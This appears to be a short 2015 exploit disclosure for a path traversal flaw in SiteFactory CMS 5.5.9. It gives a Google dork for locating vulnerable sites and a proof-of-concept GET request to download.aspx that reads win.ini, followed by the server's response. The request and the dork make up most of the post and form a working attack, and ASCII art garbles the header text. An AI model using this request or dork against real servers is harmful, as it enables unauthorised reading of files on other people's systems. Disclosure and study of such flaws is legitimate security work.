SiteFactory CMS 5.5.9 Directory Traversal
Posted on 24 August 2015
|||||||||||||| [+] Title: SiteFactory CMS 5.5.9 Path Traversal File = , [+] Date: [19-8-2015] = | [+] Autor Guillermo Garcia Marcos _= ___/ [+] Vendor: http://www.mindbite.se/ / _ (o) [+] Dork : inurl:/sitefactory/assets/ | | _ [+] info: The file parameter is vulnerable to path traversal attacks, | |/ (____) enabling read access to arbitrary files on the server. \__/ / | Latest versions can be vulnerable. / / ___) [+] Timeline research: / _) ) 18-8-2015: Bug found / ( 19-8-2015: Public disclosure / \_________/ |\_________________,_ ) / / | ==== _______)__) / / __/___ ====_/ / / (O____)\_(_/ (O_ ____) (O____) [+]PoC: Request : GET /sitefactory/assets/download.aspx?file=c%3awindowswin.ini HTTP/1.1 Host: censored-host.com Response: HTTP/1.1 200 OK Cache-Control: private Content-Type: application/octet-stream Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 content-disposition: attachment; filename=win.ini X-Powered-By: ASP.NET Date: Tue, 18 Aug 2015 17:58:14 GMT Content-Length: 92 ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 // https://twitter.com/GuilleSec
